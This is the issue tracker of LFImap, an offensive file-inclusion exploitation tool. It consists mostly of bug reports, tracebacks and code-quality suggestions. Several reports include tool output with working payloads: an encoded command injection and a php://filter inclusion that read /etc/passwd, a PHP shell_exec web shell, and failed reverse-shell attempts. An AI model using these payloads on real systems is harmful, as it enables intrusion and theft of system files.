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lfimap's Issues

AttributeError: 'Namespace' object has no attribute 'is_tested_param_post'

└─# python3.9 --all -F /WhiteyCookie/Github/ParamSpider/paramspider/results/ -v

[i] Session information is not provided. LFImap might have troubles finding vulnerabilities if testing endpoint requires authentication.

[i] Parsing URL [1/279]: ''
[i] Preparing to test GET 'cHash' parameter...

[i] Preparing to test misc issues using heuristics...
[.] Testing for XSS...
[.] Testing for CRLF...
[.] Testing for error-based info leak...
[.] Testing for open redirect...
[i] Testing with filter wrapper...
[i] Testing with input wrapper...
Traceback (most recent call last):
File "/WhiteyCookie/Github/LFImap/", line 375, in
File "/WhiteyCookie/Github/LFImap/", line 111, in main
test_input(url, "")
File "/WhiteyCookie/Github/LFImap/src/attacks/", line 16, in test_input
AttributeError: 'Namespace' object has no attribute 'is_tested_param_post'

TODO: Try including different files

The issue is that /etc/passwd might be blocked by waf, so try to include modality that will use 'silent' payloads and include different files to confirm the vulnerability.

Also Java tends to not allow path traversal outside the web root, so implement something like /WEB-INF/web.xml or alike method of discovery...

TypeError: get_params_with_param() takes 1 positional argument but 2 were given

└─# python3.9 --t -F /WhiteyCookie/Github/ParamSpider/paramspider/results/ --use-long -v

[i] Session information is not provided. LFImap might have troubles finding vulnerabilities if testing endpoint requires authentication.

[i] Parsing URL [1/279]: ''
[i] Preparing to test GET 'cHash' parameter...
[i] Testing path truncation using '/WhiteyCookie/Github/LFImap/src/wordlists/long.txt' wordlist...
Traceback (most recent call last):
File "/WhiteyCookie/Github/LFImap/", line 375, in
File "/WhiteyCookie/Github/LFImap/", line 164, in main
print("[-]") + " GET parameter '" + get_params_with_param(url, args.param) + "' doesn't seem to be vulnerable.\n")
TypeError: get_params_with_param() takes 1 positional argument but 2 were given


all requirements are installed but there is a problem with the tool


Cannot init pip package bad main() call logic -> from lfimap import main

└─$ python3
Python 3.11.6 (main, Oct 8 2023, 05:06:43) [GCC 13.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.

>>> from lfimap import main
>>> main()
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/home/kali/Desktop/leet_toolz/LFImap/", line 264, in main
    if args['param'] in config.url:
AttributeError: module 'src.configs.config' has no attribute 'url'. Did you mean: 'urls'?

Issue background:

When running python3 -h, interpreter looks for if(__name__ == "__main__") and enter this block, however once the program is imported as a module and main() is called (like pip configuration does/requires), it will error out, because checkArgs is not called at all in that case:

# Check command-line arguments
if not checkArgs():

Circular dependency in code

There seems to be a circular dependency in the code that makes it impossible to load a module directly without the "" code

This makes writing tests (pytest) impossible and probably affects also the stability of the code (debugging fails to properly jump to the right place due to this), the circular dependency can bee seen in:

    from src.attacks.pwn import pwn
src/attacks/ in <module>
    from src.attacks.bash import exploit_bash
src/attacks/ in <module>
    from src.httpreqs import request
src/httpreqs/ in <module>
    from src.attacks.pwn import pwn
E   ImportError: cannot import name 'pwn' from partially initialized module 'src.attacks.pwn' (most likely due to a circular import) (src/LFImap/src/attacks/

Its not limited to the pwn module importing, rather to anything that imports pwn in some code flow

I think it is a good idea to preform code cleanup so that this doesn't happen

'black' linter

The code currently is written with somewhat weird tabbing/ missing of string concating, ' instead of ", may I recommend using black to just look more readable?

Here is a PR that will show you the difference (I just ran 'black' on the root folder)

Missing files causing false negative

The refers to these URLs:


Which decode results in:


None of these URLs exist :(

Is this intentional? looks like a mishap

Attribute Error

Hello, thank you for your project, it seems very promising.

I get the following error while trying to run it.

C:\tools\LFImap>python -U "" -C "asdasd" -a

Traceback (most recent call last):
  File "C:\tools\LFImap\", line 1799, in <module>
  File "C:\tools\LFImap\", line 1442, in main
    r,_ = REQUEST(url, headers, postTest, proxies, "test", "test")
  File "C:\tools\LFImap\", line 255, in REQUEST
    if(tOut is not None): res = requests.request(args.method, url, data=postData.encode("utf-8"), headers=headersData, proxies=proxy, verify=False, timeout=tOut)
  File "C:\Python310\lib\site-packages\requests\", line 59, in request
    return session.request(method=method, url=url, **kwargs)
  File "C:\Python310\lib\site-packages\requests\", line 562, in request
AttributeError: 'NoneType' object has no attribute 'upper'

I am using Python 3.10.6.

Any idea?

Unhandled Exception when command injection is possible + '-x' for reverse shell

└─$ python3 -U "" -D "ip=a&Submit=submit" -C "PHPSESSID=4827vaidcjprtcen3l7aoes9p0; security=low" -a -v --lhost --lport 99 -x

[i] Testing form-line 'ip' parameter...

[i] Testing misc issues using heuristics...
[i] Testing for XSS...
[i] Testing for CRLF...
[i] Testing for error-based info leak...
[i] Testing for open redirect...
[i] Testing with filter wrapper...
[i] Testing with input wrapper...
[i] Testing with data wrapper...
[i] Testing with expect wrapper...
[i] Testing with file wrapper...
[i] Testing remote file inclusion...
[i] Opening temporary local web server on port 8000 and hosting $LFIMAP_DIR/src/exploits that will be used for test inclusion
[i] Trying to include internet-hosted file...
[i] Testing path truncation using '/home/kali/Desktop/leet_toolz/LFImap/src/wordlists/short.txt' wordlist...
[i] Testing results-based OS command injection...
[+] RCE -> '' -> HTTP POST -> 'ip=1%3Bcat%24%7BIFS%7D%2Fetc%2Fpasswd%3B%23%24%7BIFS%7D%27%3Bcat%24%7BIFS%7D%2Fetc%2Fpasswd%3B%23%24%7BIFS%7D%5C%22%3Bcat%24%7BIFS%7D%2Fetc%2Fpasswd%3B%23%24%7BIFS%7D&Submit=submit'
[?] Checking if bash is available on the target system...
[*] Starting reverse listener on
[.] Trying to pop reverse shell to using bash via command injection...
[-] Previous request caused uncaught exception. Try proxying requests to see exactly what happened
Traceback (most recent call last):
  File "/home/kali/Desktop/leet_toolz/LFImap/", line 477, in <module>
  File "/home/kali/Desktop/leet_toolz/LFImap/", line 404, in main
    test_cmd_injection(url, post)
  File "/home/kali/Desktop/leet_toolz/LFImap/src/attacks/", line 54, in test_cmd_injection
    r, br = REQUEST(u, reqHeaders, postTest, proxies, "RCE", "CMD")
  File "/home/kali/Desktop/leet_toolz/LFImap/src/httpreqs/", line 221, in REQUEST
    if(init(res, "", exploitType, url, postData, headersData, exploitMethod)):
  File "/home/kali/Desktop/leet_toolz/LFImap/src/httpreqs/", line 106, in init
  File "/home/kali/Desktop/leet_toolz/LFImap/src/attacks/", line 72, in pwn
    exploit_bash(exploit, "CMD", ip, port)
  File "/home/kali/Desktop/leet_toolz/LFImap/src/attacks/", line 79, in exploit_bash
    request.REQUEST(url, args.httpheaders, post.replace(config.tempArg, encode(bashPayloadStageOne)), post, config.proxies, "", "", exploit = True)
TypeError: REQUEST() got multiple values for argument 'exploit'

Output of script not being saved to file or piped

Hi, I am trying to save the output of the script, for example like this:
python3 LFImap/ -U "http://localhost/vulnerabilities/fi/?page=include.php" -C "..." -a > fi.txt
Or by using subprocess.Popen and then using iter to get the output, but id does not print anything.
Also tryed with and capture_output, and printing it at the end... Still nothing.

Am I doing something wrong?

Move global `args` to a class/object/non-global

At the moment the constant calling to:
from src.utils.arguments import args

Is causing the code to have complexity that makes it impossible to:

  1. Write additional code without causing a dependency issue (this is visible when debugging/running unit-tests)
  2. Warnings shown when args is accessed as it doesn't know which arguments exist/don't exist
  3. No type checking when accessing the variables stored inside args
  4. Multiple times args = parser.parse_args() code is called and parameters are init

I suggest to move the code so that is not all sitting in the 'global' rather inside a class, init once when the code starts, stores the variables inside a dict rather than args or inside self values of this class, pass this newly created class around to whoever needs it or still use it as a global (but prevent its init from being called on every import)

RCE false positive when parameter is vulnerable to XSS

└─$ python3 -U "" -C "security=low; PHPSESSID=fd6582cc1b2843b479965f570419b6de" --lhost --lport 99 -r -P "" -d -heur 

[i] Testing GET 'name' parameter...
[+] XSS -> '' -> full reflection in response
    Content-Type: text/html;charset=utf-8
[+] RCE -> ''

LFImap finished with execution.
Parameters tested: 1
Requests sent: 16
Vulnerabilities found: 2

Multiple fixes to `src/utils/`

I created several PR that improve src/utils/ as well as fix some minor issues


I made it into multiple PR to make it easier to integrate, also I made the commits separate so that you can cherry pick if you choose to do so

TODO: JSON POST parameter parsing support

Add support for endpoints that use JSON as the Content-Type.

This is partially supported now, by using placeholder PWN as the injection point, however parameters won't be parsed and tested 1 by 1 automatically.

-x no longer works

Tried to initiate a reverse shell and this is the output i get:

 python3 -U "http://localhost/vulnerabilities/fi/?page=include.php" -C "PHPSESSID=pee4sgbjm74s57o43h39vevqo0; security=low" -a --lhost --lport 3001 -x -v

[i] Testing GET 'page' parameter...

[i] Testing misc issues using heuristics...
[i] Testing for XSS...
[i] Testing for CRLF...
[i] Testing for error-based info leak...
[i] Testing for open redirect...
[i] Testing with filter wrapper...
[+] LFI -> 'http://localhost/vulnerabilities/fi/?page=php%3A%2F%2Ffilter%2Fresource%3D%2Fetc%2Fpasswd'
[i] Testing with input wrapper...
[+] RCE -> 'http://localhost/vulnerabilities/fi/?page=php%3a%2f%2finput&cmd=cat%20%2Fetc%2Fpasswd' -> HTTP POST -> '<?php echo(shell_exec($_GET['cmd']));?>'
[-] Previous request caused uncaught exception. Try proxying requests to see exactly what happened
Traceback (most recent call last):
  File "/home/rares/Licenta/license/attack_scan_system/tool_repos/LFImap/", line 769, in <module>
  File "/home/rares/Licenta/license/attack_scan_system/tool_repos/LFImap/", line 642, in main
    test_input(url, post)
  File "/home/rares/Licenta/license/attack_scan_system/tool_repos/LFImap/src/attacks/", line 57, in test_input
    _, br = REQUEST(u, reqHeaders, post, proxies, "RCE", "INPUT")
  File "/home/rares/Licenta/license/attack_scan_system/tool_repos/LFImap/src/httpreqs/", line 359, in REQUEST
    if init(res, "", exploitType, url, postData, headersData, exploitMethod):
  File "/home/rares/Licenta/license/attack_scan_system/tool_repos/LFImap/src/httpreqs/", line 148, in init
NameError: name 'pwn' is not defined

Not clear instructions

Not clear how to use long.txt wordlist instead of short.txt, can you add it to instructions?

Also need some bypass techniques for waf like urlencode

Bug: uncaught exception -- args.method is None

The args.method is undefined if -M is not specified and the placeholder (--placeholder, args.param) is not part of the URL. This causes the application to crash.


The issue lies in the following lines:


Lines 1623 to 1632 in 436ea01

if(not args.method):
if(args.file): args.method = "GET"
if(args.param in args.url): args.method = "GET"
if(args.param in args.postreq): args.method = "POST"
else: args.method = "GET"

One possible solution would be setting default method in the optionsGroup.add_argument call or rewriting the code in this fashion:

if (args.url and args.param in args.url): args.method = "GET" 

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